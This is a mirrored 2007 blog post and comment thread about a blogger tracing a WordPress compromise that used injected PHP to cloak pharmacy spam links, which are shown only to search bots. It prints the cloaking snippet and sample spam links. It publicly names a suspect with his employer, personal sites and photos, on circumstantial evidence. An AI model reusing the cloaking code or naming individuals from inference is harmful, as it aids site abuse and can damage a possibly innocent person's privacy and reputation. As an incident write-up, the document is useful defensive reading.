Blogger tracks down the guy who hacked him, publishes his name and photo

Mirrored by DuggMirror at 05:14:14 EDT Aug 22, 2007

Original URL: http://justinsomnia.org/2007/08/search-engine-marketeers-are-the-new-script-kiddies/

Search Engine Marketeers are the new script kiddies

…or how Vadim Smelyansky got pwned.

On August 8th, my blog, hosted at justinsomnia.org, disappeared from Google, completely, utterly without any warning or known provocation (e.g. black hat SEO), sending the traffic to my blog plummeting.

I complained through all the known, normal channels, which in my opinion are too few and far between. I checked Google’s Webmaster Central tools, which merely confirmed that my site no longer existed in their index. Frustrating.

Finally I emailed someone at Google that one of my co-workers knew. I felt bad doing this. There are millions of sites in Google. I shouldn’t have to email an individual directly for this kind of support. It just doesn’t scale. But alas. Yesterday morning I got a response. My contact at Google discovered that someone had actually hacked my site and was displaying search engine spam to search engine bots only!

Let me say that again. My blog was hacked! Ugh. So I have to admit I haven’t updated WordPress to the latest version, and I’m sure Gallery is not up to snuff either. What follows is a description of the hack and my eventually successful attempt to figure out who did this to me.

Here’s where I figure out what happened

Basically someone got access to my WordPress theme files. In footer.php the following line of code was added:

include('index2.php');

Then a file called index2.php was created that contained the following PHP code:

<?
$bots=array('ooglebot', 'yahoo', 'live', 'msn');
$y=0; for($i=0; $i<sizeof ($bots); $i++) if(strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), strtolower($bots[$i]))) $y=1;
if($y){
  include('rq.txt');
}
?>

This means that if the user agent (e.g. web browser, search engine bot, feedreader, etc.) identified itself as one of the Google, Yahoo, Live, or MSN indexers (instead of Firefox or Internet Explorer), the file rq.txt would be included on the page. That file contained a list of 20 search engine spam links pointing to several compromised sites (which I have notified), which in turn redirected you to the intended destination, in this case a supposed Canadian pharmaceutical e-commerce site, canadianmedsworld.com:

<a href=http://www.bluehighways.com/albums/buy-levitra.html>buy levitra</a><br>
<a href=http://www.uxmatters.com/scripts/viagra-online.html>viagra online</a><br>
...
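The check in index2.php is nothing more than a case-insensitive substring match against the User-Agent header. A rough Python equivalent is sketched below; the names BOT_MARKERS and is_targeted_bot are made up for illustration and do not appear in the attacker's code.

```python
# Substrings copied from the $bots array in index2.php.
BOT_MARKERS = ("ooglebot", "yahoo", "live", "msn")


def is_targeted_bot(user_agent: str) -> bool:
    """Return True if the user agent would have been served rq.txt.

    Mirrors the PHP logic: lowercase the header, then look for any marker
    as a plain substring (no word boundaries, no IP verification).
    """
    ua = user_agent.lower()
    return any(marker in ua for marker in BOT_MARKERS)


if __name__ == "__main__":
    print(is_targeted_bot("Googlebot/2.1 (+http://www.google.com/bot.html)"))
```

Because the match is a bare substring test, any client that merely claims to be one of these bots gets the spam links, which is what makes the hack easy to reproduce from an ordinary browser.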

To confirm this, I switched Firefox’s user agent to Googlebot’s, Googlebot/2.1 (+http://www.google.com/bot.html), using the User Agent Switcher extension, and sure enough, the spam links appeared on EVERY PAGE of my site!!! Quelle horreur! I felt so violated.

Justinsomnia with spam links
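The same browser test can be scripted. The sketch below is one possible approach, not a tool used in this investigation: it fetches a page under two different user agents and reports links that only the bot version contains. The helper names (fetch_as, links_in, bot_only_links) are hypothetical, and it assumes the cloaking keys on the User-Agent header alone, as it did here.

```python
from html.parser import HTMLParser
from urllib.request import Request, urlopen


class LinkCollector(HTMLParser):
    """Collects the href value of every <a> tag fed to the parser."""

    def __init__(self):
        super().__init__()
        self.links = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.add(value)


def links_in(html: str) -> set:
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    return collector.links


def fetch_as(url: str, user_agent: str) -> str:
    """Download a page while sending the given User-Agent header."""
    request = Request(url, headers={"User-Agent": user_agent})
    with urlopen(request, timeout=10) as response:
        return response.read().decode("utf-8", errors="replace")


def bot_only_links(browser_html: str, bot_html: str) -> set:
    """Links present in the bot's copy of the page but not the browser's."""
    return links_in(bot_html) - links_in(browser_html)
```

A typical use would be to call fetch_as twice on the same URL, once with a browser user agent and once with Googlebot's, and pass both results to bot_only_links. On a dynamic page some differences are innocent, so the output is a list of leads to inspect rather than proof of a hack.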

Here’s where I figure out who did this

The timestamp on index2.php was Jul 3 13:35, which I believe was the initial date of the attack. The rq.txt file had been updated as recently as Aug 18 04:15. Then before my very eyes it was updated again yesterday, Aug 20 11:05, with even more spam links. I checked my http logs for both Aug 18 04:15 and Aug 20 11:05, but nothing looked out of the ordinary, just normal GET requests. Could my Dreamhost shell account have been compromised?—a fate even scarier than a WordPress bug.
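File modification times were the first real clue here. For anyone wanting to run the same check over a whole site directory, a minimal sketch follows; files_modified_since is a made-up helper name, and the cutoff is whatever date you last trust. Keep in mind that an intruder with write access can also reset modification times, so a clean result proves little.

```python
import os


def files_modified_since(root: str, cutoff_epoch: float) -> list:
    """Return (mtime, path) pairs for files under root changed at or after
    cutoff_epoch (seconds since the Unix epoch), newest first."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            mtime = os.path.getmtime(path)
            if mtime >= cutoff_epoch:
                hits.append((mtime, path))
    return sorted(hits, reverse=True)
```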

So I started digging. Googling for the filenames created in the attack, I only found one other blog post, in Spanish, describing the same symptoms but without any really helpful information. My http logs don’t go back to July 3rd, but I have a JavaScript-based request tracker which does. One minute after 13:35 on July 3 I found this very interesting request:

select * from request where request_id = 1857380\G
*************************** 1. row ***************************
        request_id: 1857380
       request_url: http://justinsomnia.org/
  request_referrer: http://fitis.google.com/rio/index.php?unit=adv_areas&sort_by=pr&sort_order=desc&page_n=1
      request_date: 2007-07-03 13:36:22
request_user_agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
        request_ip: 62.140.244.24

The most interesting detail is the request_user_agent value. But first some background. The reason for building a request tracker in JavaScript (rather than parsing server logs) is that search engine bots don’t execute JavaScript like a web browser does. So that serves as a reliable way to filter out automated requests from the human ones I’m interested in. This also means that the Googlebot user agent should NEVER appear in my stats. But sure enough, there it was, one minute after my blog’s theme had been hacked. Out of 1.9 million request records, only 70 ever identify as Googlebot (usually people who’ve changed their browser’s user agent for testing purposes). Then a day later, on July 4, my homepage was requested from the same IP (62.140.244.24), again with a user agent of “Googlebot”. What this means is that someone was manually checking my site in their web browser, masquerading as the Googlebot, to see if their hack had succeeded.
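The lookup described above amounts to one query: find every tracked request whose user agent claims to be Googlebot. The sketch below shows the idea using Python's built-in sqlite3 as a stand-in for the real MySQL tracker. The table and column names come from the record shown earlier; the function names and the second sample row are invented for illustration.

```python
import sqlite3


def demo_connection() -> sqlite3.Connection:
    """Build an in-memory stand-in for the tracker's request table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE request ("
        " request_id INTEGER PRIMARY KEY, request_url TEXT,"
        " request_referrer TEXT, request_date TEXT,"
        " request_user_agent TEXT, request_ip TEXT)"
    )
    rows = [
        # The suspicious record quoted in the post.
        (1857380, "http://justinsomnia.org/",
         "http://fitis.google.com/rio/index.php?unit=adv_areas&sort_by=pr&sort_order=desc&page_n=1",
         "2007-07-03 13:36:22",
         "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
         "62.140.244.24"),
        # A made-up ordinary visitor, for contrast.
        (1, "http://justinsomnia.org/", "", "2007-07-03 13:40:00",
         "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0", "192.0.2.10"),
    ]
    conn.executemany("INSERT INTO request VALUES (?, ?, ?, ?, ?, ?)", rows)
    return conn


def bot_agent_requests(conn: sqlite3.Connection, marker: str = "Googlebot") -> list:
    """Requests whose user agent contains marker, oldest first."""
    sql = (
        "SELECT request_id, request_date, request_ip, request_referrer "
        "FROM request WHERE request_user_agent LIKE ? ORDER BY request_date"
    )
    return conn.execute(sql, (f"%{marker}%",)).fetchall()
```

Grouping the resulting rows by request_ip is the natural next step, since a repeat visit from the same address is what ties the two Googlebot sightings together.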

Now let’s take a look at the request_referrer value. That’s the URL of the webpage the person had in their browser when they clicked on a link pointing to http://justinsomnia.org/ (presumably out of a list of other hacked sites). First of all, http://fitis.google.com/ does not exist. That’s probably there to make the request look like it’s genuinely coming from Google. It’s very likely that they’d simply mapped that hostname to localhost in /etc/hosts. rio is presumably the name of an application for hacking sites and managing spam links. index.php is just the standard filename, and everything else is the query string. So I started Googling for a spamming application called “rio” or any occurrence of those query string variables in Google’s Code Search. Nada. Until I searched for the innocuous-looking adv_areas value in Google proper, and struck veritable gold.
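Pulling a referrer apart like this is easy to do mechanically. A small sketch using Python's standard urllib.parse follows; dissect_referrer is a hypothetical helper name, and it keeps only the first value of each query parameter.

```python
from urllib.parse import parse_qs, urlsplit


def dissect_referrer(url: str) -> dict:
    """Split a referrer URL into host, path, and query parameters."""
    parts = urlsplit(url)
    return {
        "host": parts.hostname,
        "path": parts.path,
        # parse_qs returns a list per key; keep the first value of each.
        "params": {key: values[0] for key, values in parse_qs(parts.query).items()},
    }


if __name__ == "__main__":
    referrer = ("http://fitis.google.com/rio/index.php"
                "?unit=adv_areas&sort_by=pr&sort_order=desc&page_n=1")
    print(dissect_referrer(referrer))
```

The parameter names and values (unit, adv_areas, sort_by, and so on) are exactly the kind of distinctive strings worth feeding to a search engine one at a time.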

There were only two results for that seemingly generic variable. The first was a MySQL bug report containing what appears to be a partial database schema for an SEO hacking/spamming engine:

adv_pages_free | CREATE TABLE `adv_pages_free` (
  `adv_page_id` int(11) NOT NULL default '0',
  `randomized` int(11) unsigned default NULL,
  PRIMARY KEY  (`adv_page_id`),
  KEY `randomized` (`randomized`,`adv_page_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 

adv_pages | CREATE TABLE `adv_pages` (
  `adv_page_id` int(11) NOT NULL auto_increment,
  `hostid` int(11) NOT NULL default '0',
  `uri` varchar(255) NOT NULL default '',
  `industry_id` smallint(4) NOT NULL default '0',
  `theme` varchar(255) default NULL,
  `filename` varchar(36) default NULL,
  `committed` timestamp NOT NULL default '0000-00-00 00:00:00',
  `commit_id` int(11) NOT NULL default '0',
  `nlinks` int(11) NOT NULL default '0',
  `keyword` text,
  PRIMARY KEY  (`adv_page_id`),
  UNIQUE KEY `uniq_page_id` (`hostid`,`uri`),
  KEY `page_id1` (`hostid`,`adv_page_id`,`uri`,`industry_id`)
) ENGINE=MyISAM AUTO_INCREMENT=21777537 DEFAULT CHARSET=latin1

adv_areas | CREATE TABLE `adv_areas` (
  `adv_page_id` int(11) NOT NULL default '0',
  `area_id` tinyint(4) NOT NULL default '1',
  `sentence_id` int(11) NOT NULL default '0',
  `anchor_text` varchar(255) NOT NULL default '',
  `promoted_id` int(11) NOT NULL default '0',
  `promoted_type` tinyint(1) NOT NULL default '2',
  `crawlMask` tinyint(4) NOT NULL default '0',
  UNIQUE KEY `uniq_area_id` (`adv_page_id`,`area_id`),
  KEY `promoted_id` (`promoted_type`,`promoted_id`),
  KEY `promoted_type_2` (`promoted_type`),
  KEY `promoted_type` (`adv_page_id`,`promoted_type`,`area_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1

adv_hosts | CREATE TABLE `adv_hosts` (
  `hostid` int(11) NOT NULL auto_increment,
  `hostname` varchar(255) default NULL,
  `rev_hostname` varchar(255) default NULL,
  `port` smallint(6) NOT NULL default '80',
  `ip` varchar(50) default NULL,
  `classc` int(11) NOT NULL default '0',
  `oldip` varchar(50) default NULL,
  `link_industry_id` int(11) default '18',
  `g_known` tinyint(1) default '0',
  `y_known` tinyint(1) default '0',
  `m_known` tinyint(1) default '0',
  `g_banned` tinyint(1) default '0',
  `y_banned` tinyint(1) default '0',
  `m_banned` tinyint(1) default '0',
  `customized` tinyint(1) NOT NULL default '0',
  `modified` datetime default NULL,
  PRIMARY KEY  (`hostid`),
  UNIQUE KEY `hostname` (`hostname`,`port`),
  KEY `ip` (`ip`),
  KEY `iphostid` (`ip`,`hostid`),
  KEY `rev_host_name` (`rev_hostname`)
) ENGINE=MyISAM AUTO_INCREMENT=100404 DEFAULT CHARSET=latin1

You can interpret for yourself what you think the fields stand for, but it’s three in the adv_hosts table that stand out the most to me: g_banned, y_banned, and m_banned. What else do G, Y, and M stand for these days other than Google, Yahoo, and Microsoft? Fields like “theme”, “filename” and “nlinks” (number of links?) are also suspicious. Note the AUTO_INCREMENT value for the adv_hosts table: 100,404! Together with the AUTO_INCREMENT value of 21,777,537 on adv_pages, one could infer that as of July 16, 2007 (when the bug was reported), this guy had already hacked over 100k sites, containing nearly 21.8 million defaced spam pages. Stunning. Later in the bug report he adds “Unfortunately I can not provide database content.” Yeah, I bet you can’t.
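A note on reading those counters: in SHOW CREATE TABLE output, the AUTO_INCREMENT table option is the next id MySQL will hand out, so it is an upper bound on rows ever inserted, not a count of rows that still exist. The sketch below pulls the value out of a table definition; the function names are illustrative, and the estimate assumes ids start at 1 and increase by 1.

```python
import re
from typing import Optional

# Matches the table option "AUTO_INCREMENT=<n>", not the lowercase
# "auto_increment" column attribute, which has no "=<n>" after it.
_AUTO_INC = re.compile(r"\bAUTO_INCREMENT=(\d+)")


def next_auto_increment(ddl: str) -> Optional[int]:
    """Return the AUTO_INCREMENT table option from one CREATE TABLE
    statement, or None if the table does not declare one."""
    match = _AUTO_INC.search(ddl)
    return int(match.group(1)) if match else None


def max_rows_ever_inserted(ddl: str) -> Optional[int]:
    """Upper bound on ids assigned so far (assumes start 1, step 1)."""
    value = next_auto_increment(ddl)
    return None if value is None else value - 1
```

Applied to the adv_hosts definition this gives at most 100,403 host rows ever created; deleted rows and failed inserts can make the true figure lower.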

That bug report contained one other incredible piece of information: the name of the reporter, one Vadim Smelyansky.

Vadim, as it turns out, is not shy on the internet. His rather unique name returns 294 pages in Google currently, including a LinkedIn profile page describing him as a Software Engineer at “SEM Professionals”. I contacted Jonathan Casuncad of the Philippines-based SEM Professionals, who denies that Vadim works for him.

SEM, for the uninitiated, usually stands for “Search Engine Marketing” which is code for those who try to spam or game search engines into increasing the rank of certain search results for their clients (through any means necessary it seems). Suddenly my circumstantial evidence was looking a lot less circumstantial.

That search for “Vadim Smelyansky” in Google also returns what appears to be Vadim’s old personal homepage, www.afik1.co.il, with links to a resume last updated in 2003 and lots of pictures of Vadim, who appears to have an interest in scuba diving.

Screenshot of Vadim Smelyansky's homepage: http://www.afik1.co.il/

Continuing down through the search results we find his latest website, www.vadiaz.com with a resume up-to-date as of September 2006, describing him as working for a company called “SEM Professional” in Israel. Apparently he worked for Microsoft from 2003-2006 just before deciding to engage in criminal activities. Ironic.

Screenshot of Vadim Smelyansky's Vadiaz consulting website: http://www.vadiaz.com/

Dare I mention that his resume contains his address and phone numbers? So Vadim, what do you have to say for yourself? Considering you are a self-described expert, how would you rate my “network intrusion detection”?

Here’s where I figure out how he did this

Actually I’m not 100% sure. Dreamhost does not believe my password was leaked last June when they experienced an FTP-related leak of 3500 passwords, though the time of the first intrusion (July 3) coincides with when other bloggers discovered their sites hacked (e.g. mezzoblue). If not Dreamhost then the next likely culprit would be an unknown vulnerability in PHP or WordPress. However, cross-referencing the timestamps of the hacked file updates with my http access log turned up nothing.

Finally this morning Dreamhost sent me justinsomnia.org’s ftp access logs for the last 6 days which contained the smoking gun. Remember the timestamps of the updated rq.txt? Aug 18 04:15 and Aug 20 11:05. Check out the timestamps of the two most recent entries at the top of the log:

jwatt    ftpd23817    201.27.197.215   Mon Aug 20 11:05 - 11:05  (00:00)
jwatt    ftpd10510    83.170.6.133     Sat Aug 18 04:15 - 04:15  (00:00)
jwatt    ftpd31925    125.163.255.120  Wed Aug 15 17:47 - 17:47  (00:00)
jwatt    ftpd19135    125.163.255.120  Wed Aug 15 16:54 - 16:55  (00:00)

At which point I disabled FTP (which I never use), changed my passwords, and will shortly begin updating my software. But first I had to post this.
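Matching login times against file modification times can also be scripted. The sketch below parses log lines in the layout shown above and keeps the sessions that began in the same minute a file changed. The function names are hypothetical, the year is an assumption (the log lines do not carry one), and month names are parsed with the default English locale.

```python
from datetime import datetime


def parse_ftp_line(line: str, year: int = 2007) -> tuple:
    """Parse 'user session ip Weekday Mon DD HH:MM - HH:MM (dur)'.

    Returns (user, ip, session_start). The weekday column is ignored,
    and the year must be supplied because the log omits it.
    """
    parts = line.split()
    user, ip = parts[0], parts[2]
    stamp = f"{parts[4]} {parts[5]} {parts[6]} {year}"
    return user, ip, datetime.strptime(stamp, "%b %d %H:%M %Y")


def logins_matching(log_lines: list, modified_times: list, year: int = 2007) -> list:
    """Return (ip, start) for sessions that began at a file's mtime minute."""
    wanted = set(modified_times)
    matches = []
    for line in log_lines:
        _user, ip, start = parse_ftp_line(line, year)
        if start in wanted:
            matches.append((ip, start))
    return matches
```

Fed the four log lines above and the two rq.txt timestamps, this singles out the sessions from 201.27.197.215 and 83.170.6.133, the same pair spotted by eye.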

20 comments

Daaaaaamn … Don’t mess with Justin!

Take that, Vadim! What’s his number?

So impressed with your investigation… You are now ready to be a secret agent! Watch out Vadim, you don’t know whose blog you dared to intrude!

Marcia, his phone number is on his resume. Though I have a copy of it for my records, and though he illegally and maliciously broke into my website for profit, I had to weigh the ethics of reposting it here versus respecting some shred of his privacy—in light of the attention this post may generate. I chose the latter. Plus there’s always the wayback machine.

Stephanie, the last two days felt uncannily like the Bourne Ultimatum. Without the punching.

Reminds me also of the book Cuckoo’s Egg. Tracking down hackers makes for good reading.

Great investigative work Justin! Thanks for sharing it. I will bookmark this and use it as reference. You should write a WP hardening post.

Tony, failed to mention that your CrowdVine redirector, which happened to get indexed by Google, displayed a page of my site in their cache with the spam links, which helped uncover why I got banned. And you’re the second person who’s mentioned that book.

BrianR, thanks, and btw, the crux of my hardener is here: Escalating the war on comment spam.

Speaking as an Israeli, our rise in notoriety seems to coincide with the influx of the million or so Russian immigrants some years back. Also, Israel’s single computer crime department of the police contains about 8-12 officers, some of whom are there only part time, and their budget is low.

He probably wrote the code but that doesn’t mean he personally spammed your blog. He probably sells the code.

Ron, just to be clear, I have nothing against Israelis or Russians, or Israeli-Russians. However, I do not like people breaking into my site as much as anyone would not want someone breaking into their home.

umm, does that make him any less culpable? I think not.

Just for a bit of clarity, it’s only the blackhat SEMs that do crap like this - the whitehat guys (the majority of them) keep things legal and ethical.

He’s Ukrainian-Israeli. NOT Russian-Israeli!

“012373/03 The State of Israel vs. Smelyanski Vadim” (14/09/2004)

It’s for driving on the shoulder of the road in a traffic jam and then giving the police silly excuses about it. I think it fits nicely with the general pattern of antisocial behavior.

Now I know who I can ask for help investigating this kind of unscrupulous hacking. It is just so unethical.

Anyway, for some reason, I don’t see how you managed to find his name.

nice sleuthing, me thinks he’ll receive a fair amount of annoyance when this hits the frontpage. But I just hope it’s the right guy, you could ruin the guy’s life if he’s not the one responsible. I’d personally say follow the sleazy prescription site - the owner probably knows or is the spammer.

Soooo, the crux of it is that your blog got hacked and consequently knocked off Google’s index as a result of Dreamhost leaking passwords? Has anyone considered … y’know … kicking Dreamhost’s arse?

David, I tried my best not to paint all SEO practitioners with the same brush, but thanks for emphasizing that point.

Mike, you are correct.

Oren, wow, thanks for that link, and the rough Hebrew translation—totally radical seeing Google Ads in Hebrew.

Keith, his name appears in this MySQL bug report. The database tables described in that report, combined with his resume and LinkedIn profile listing his current employer as SEM Professional(s), all suggest that he is involved in some sort of unscrupulous activity, even if, unlikely as it would seem, he was not the person directly responsible for breaking into my account.

PsychoticApe, I tried very carefully to paint an accurate picture of the information I found, without intentionally trying to ruin his life. If I am wrong, I will retract this post and apologize.

DaveP, that may be the case, though Dreamhost doesn’t think so. Either way I can’t assign blame. It’s possible that my password got into his hands through some insecure channel.

I had a similar incident where a French student got into a Windows Server machine and uploaded about 100GB of Warez.

Only had to Google a single keyword to find all the evidence I needed. One thing led to another and I ended up with his name, address, email, etc.

Rather satisfying :)

Terrific sherlocking… good job exposing him!